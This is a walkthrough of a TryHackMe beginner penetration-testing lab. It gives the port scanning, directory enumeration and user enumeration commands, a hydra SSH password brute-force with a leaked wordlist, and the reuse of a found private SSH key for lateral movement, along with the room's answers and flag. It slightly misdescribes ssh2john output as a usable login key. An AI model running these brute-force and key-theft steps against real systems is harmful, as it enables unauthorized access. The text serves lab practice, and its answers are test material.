https://tryhackme.com/room/basicpentestingjt

Deploy the machine and connect to our network

Find the services exposed by the machine

use nmap -sS -A -p- IP address to scan for open ports

PORT STATE SERVICE

22/tcp open ssh

80/tcp open http

139/tcp open netbios-ssn

445/tcp open microsoft-ds

8009/tcp open ajp13

8080/tcp open http-proxy

What is the name of the hidden directory on the web server(enter name without /)?

use gobuster dir -u (ip) -w /usr/share/wordlists/dirb/common.txt to find for hidden directories:

found /development

User brute-forcing to find the username & password

use enum4linux -a (ip) to find for users:

S-1-22-1-1000 Unix User\kay (Local User)

S-1-22-1-1001 Unix User\jan (Local User)

use hydra with wordlist to crack password hydra -t 4 -l jan -P /usr/share/wordlists/rockyou.txt.gz ssh://(ip)

What is the username?

jan

What is the password?

armando

What service do you use to access the server(answer in abbreviation in all caps)?

SSH

Enumerate the machine to find any vectors for privilege escalation

Once inside the user jan, find user kay and list all hidden files. unable to cat pass.bak file. Found a hidden .ssh directory and the private key (id_rsa) is found.

Copy entire private key into a file (hash) and use python program to hash the key: python ssh2john.py hash > sshkey

What is the name of the other user you found(all lower case)?

kay

If you have found another user, what can you do with this information?

use the new hash ssh key to login via ssh – ssh -i (path to hash ssh key) kay@(ip) this will enable to be log on as kay user and able to cat pass.bak file to find the final password

What is the final password you obtain?

🏴‍☠️heresareallystrongpasswordthatfollowsthepasswordpolicy$$